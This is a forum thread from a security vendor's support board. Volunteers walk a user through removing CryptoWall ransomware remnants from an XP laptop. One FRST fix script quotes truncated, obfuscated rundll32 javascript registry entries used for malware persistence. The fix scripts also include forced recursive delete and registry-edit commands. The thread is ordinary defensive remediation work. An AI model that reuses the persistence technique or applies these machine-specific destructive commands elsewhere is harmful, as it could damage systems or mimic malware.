Author Topic: CrytpoWall and URL:Mal!  (Read 4733 times)

0 Members and 1 Guest are viewing this topic.

REDACTED

  • Guest
CrytpoWall and URL:Mal!
« on: October 05, 2015, 12:16:15 PM »
Hi all! First time posting on these forums, although I have been an avast user for many years. I just wanted to say I love the product and I always recommend it over any other AV tool out there. So, here's what brings me to the forums today.

A coworker of mine handed me his daughter's notebook and asked me to get it running right again, but I'm completely stumped with this one. Normally I can run my tools and get everything back to 100%. Originally it was just running insanely slow (picture being on a Win95 machine right now), taking about 2 minutes between clicks for things to fully load. I finally managed to get avast installed and got rid of the useless ConstantGuard that was already installed.

After running MalwareBytes and cleaning a ton of junk off of it, and then getting avast to inform me that CryptoWall had polluted this thing (hundreds upon hundreds of HELP_ENCRYPT.* files), I thought I was finally in the clear. Follow-up scans by both programs revealed nothing, but it was still running slow. Now I'm getting a loop of approximately 51 URLs being blocked by avast which are all stating URL:Mal. However, the scans still say nothing. It is also forcing a CHKDSK upon bootup/restart EVERY time, not sure why. I even checked the Task Scheduler and found nothing. I'm still seeing the hundreds upon hundreds of HELP_ENCRYPT.* files in every single relevant system folder as well (although evidently not infected).

Hopefully these logs will shed some light on my issue. Thanks for the help in advance. It is very much appreciated!

Offline Michael (alan1998)

  • Massive Poster
  • ****
  • Posts: 2768
  • Volunteer
Re: CrytpoWall and URL:Mal!
« Reply #1 on: October 05, 2015, 12:24:50 PM »
I already know the answer to this:

(Microsoft Corporation) C:\32788R22FWJFW\cmd.3XE
() C:\32788R22FWJFW\pev.3XE

Find and upload them to www.virustotal.com . I think someone faked an M$ signature there...

Remover notified.

 :o :o
2015-10-04 14:53 - 2015-10-04 15:11 - 00000000 ___SD C:\ComboFix
2015-10-04 14:52 - 2015-10-04 14:53 - 00000000 ____D C:\Qoobox

Although it's a good tool, please do not use it without some serious supervision. If you've ALREADY run it, attach the log. If you have not, do not attach it. CF should be used by only specialists.
« Last Edit: October 05, 2015, 12:27:21 PM by Michael (alan1998) »
VOLUNTEER

Senior Security Analyst; Sys Admin (Linux); Forensics/Incident Response.

Security is a mindset, not an application. Think BEFORE you click.

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: CrytpoWall and URL:Mal!
« Reply #2 on: October 05, 2015, 04:34:37 PM »
Hi this may well need several runs to clean

CAUTION :  This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 
Quote
CreateRestorePoint:
Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"ibch5\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Ridm (the data entry has 361 more characters). <==== ATTENTION
HKLM\...99B7938DA9E4}\LocalServer32: [a] rundll32.exe javascript:"ibch5\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Ridm (the data entry has 27831 more characters). <==== ATTENTION
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <==== ATTENTION
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
Toolbar: HKU\S-1-5-21-460486182-2704883870-4021508746-1006 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
2015-10-04 15:19 - 2015-10-04 15:25 - 00000000 ___SD C:\32788R22FWJFW
2015-10-01 17:25 - 2015-04-03 15:41 - 00000000 ____D C:\Documents and Settings\Emmie\Local Settings\Application Data\tomyqq
2015-10-01 17:25 - 2015-02-04 21:58 - 00000000 ____D C:\Documents and Settings\Emmie\Local Settings\Application Data\44b5baf2-c6d8-4e22-aebc-e18685531fea
2015-10-01 17:25 - 2014-09-23 18:42 - 00000000 ____D C:\Program Files\MalwareProtection360
2015-10-01 17:25 - 2009-08-01 00:34 - 00000000 __SHD C:\Documents and Settings\Emmie\Local Settings\Application Data\{26752934-2fdf-5111-52c9-ab697a4499a3}
2015-10-01 17:24 - 2015-03-31 14:23 - 00000000 ____D C:\Documents and Settings\Emmie\Local Settings\Application Data\ukek
2015-10-01 17:24 - 2015-03-30 14:52 - 00000000 ___HD C:\Documents and Settings\All Users\Application Data\{D59601A0-67DF-4A0D-9F82-36BB7D0B27A7}
C:\Windows\Installer\{26752934-2fdf-5111-52c9-ab697a4499a3}
2015-10-02 18:15 - 2010-11-22 19:04 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\{429CAD59-35B1-4DBC-BB6D-1DB246563521}
2015-10-02 18:15 - 2010-01-04 19:31 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
2015-10-02 18:14 - 2015-01-10 21:48 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-10-02 18:09 - 2014-09-23 20:49 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\188F1432-103A-4ffb-80F1-36B633C5C9E1
CMD: del /F /Q /S "C:\HELP_DECRYPT.HTML"
CMD: del /F /Q /S "C:\HELP_DECRYPT.PNG"
CMD: del /F /Q /S "C:\HELP_DECRYPT.URL"
CMD: del /F /Q /S "C:\HELP_DECRYPT.TXT"
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: Reg Add "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers


Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Scan with IDTool
 
Please download IDTool by Nathan and save the file to the desktop.
It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.
  • Enter the IDTool directory, right-click on icon and select Run as Administrator to start the tool.
  • IDTool needs Micorsoft .NET Framework environment to work properly, so if prompted to download & install it please agree
  • Wait patiently until the tool will collect necessary data
  • Once the main console is loaded, please press Rescan Computer and Generate a New Report.
  • When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
  • Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience
Please include that contents in your next reply.

REDACTED

  • Guest
Re: CrytpoWall and URL:Mal!
« Reply #3 on: October 05, 2015, 11:33:38 PM »
Ok, so here is what both of those turned up. Looks like there's still some remnants of CryptoWall and other things.

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: CrytpoWall and URL:Mal!
« Reply #4 on: October 06, 2015, 03:57:57 PM »
Lets clear the flag now, meanwhile how is the computer behaving ?

CAUTION :  This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 
Quote
CreateRestorePoint:
Reg: Reg Delete "HKCU\Software\D026A52F1C42ED6E1D7970FC81C7DDBF" /F
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

 
Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that

REDACTED

  • Guest
Re: CrytpoWall and URL:Mal!
« Reply #5 on: October 06, 2015, 10:20:53 PM »
Things seem to be running much better. FRST crashed when I tried to run it, but generated a log nonetheless. Bitsadmin isn't installed on this PC for whatever reason, and I can't get the tools to install from MS either.  Here is the log as you requested.

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: CrytpoWall and URL:Mal!
« Reply #6 on: October 06, 2015, 10:50:36 PM »
Bitsadmin is not available in XP I should have removed that command .. Oops 

I believe all the HELP_DECRYPT files should now be gone...  Any outstanding problems ?

REDACTED

  • Guest
Re: CrytpoWall and URL:Mal!
« Reply #7 on: October 07, 2015, 01:07:51 AM »
None that I can see. Some failures on Windows Updates but that's not necessarily a big issue. About to upgrade to 7 then 10 on this machine. Just wanted to clean it up so I didn't corrupt a fresh install.

Offline Michael (alan1998)

  • Massive Poster
  • ****
  • Posts: 2768
  • Volunteer
Re: CrytpoWall and URL:Mal!
« Reply #8 on: October 07, 2015, 01:20:56 AM »
Impossible....

When you upgrade to 7, you're wiping all windows files. I don't know how many times I've reinstalled in an old, corrupted Windows inside a VM, or my actual Machine....

The update to 7 to 10 can be an issue though, assuming you use GWX (Get Windows 10).
VOLUNTEER

Senior Security Analyst; Sys Admin (Linux); Forensics/Incident Response.

Security is a mindset, not an application. Think BEFORE you click.

REDACTED

  • Guest
Re: CrytpoWall and URL:Mal!
« Reply #9 on: October 07, 2015, 02:26:04 AM »
You're right, but I always try to make sure I have a clean slate before doing an install (unless it's a pre-format). With CryptoWall, I had no idea what was and wasn't affected.

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: CrytpoWall and URL:Mal!
« Reply #10 on: October 07, 2015, 04:45:07 PM »
Subject to no further problems   :)

I will remove my tools now and give some recommendations, but, I would like you to run for 24 hours or so and come back if you have any problems 

Now the best part of the day ----- Your log now appears clean  :thumbsup:

A good workman always cleans up after himself so..The following will implement some cleanup procedures as well as reset  System Restore points:

Remove Combofix

Click  Start  then Run.
On Windows7 or Vista  you may use  Start Search  field if  Run  is not available.
In the box copy/paste the following command:

ComboFix  /Uninstall

Note that there is a space between "  ComboFix  " and "  /Uninstall  " .

Then click  OK  (or press  Enter ).
Wait for the uninstall process to complete.

Remove tools

Download and run Delfix
Select the options as shown



: Keep Java Updated :

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article

I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)

If you do need to keep Java then download JavaRa
Run the programme and select  Remove Java Runtime.  Uninstall all versions of Java present
Once done then run it again and select Update Java runtime > Download and install Latest version



Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent install this programme to lock down and prevent crypto ransome ware



Malwarebytes

Update and run weekly to keep your system clean

Unchecky

Click on the link above to be taken to Unchecky.com
click the very large Download button.
click Save
Click Open folder
Right click on the Unchecky_setup and choose to Run as Administrator
Once open click the Install button.
Then click on Finish
Unchecky is now installed and will help you keep unwanted check boxes unchecked, this is a fire and forget programme  ;)

It is critical to have both a firewall and anti virus to protect your system and to keep them updated.

To learn more about how to protect yourself while on the internet read this little guide  Best security practices Keep safe  :wave:

REDACTED

  • Guest
Re: CrytpoWall and URL:Mal!
« Reply #11 on: October 08, 2015, 11:24:45 PM »
Thank you so much for all of your help! I'm sure you don't get that enough.

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: CrytpoWall and URL:Mal!
« Reply #12 on: October 09, 2015, 02:27:25 PM »
:)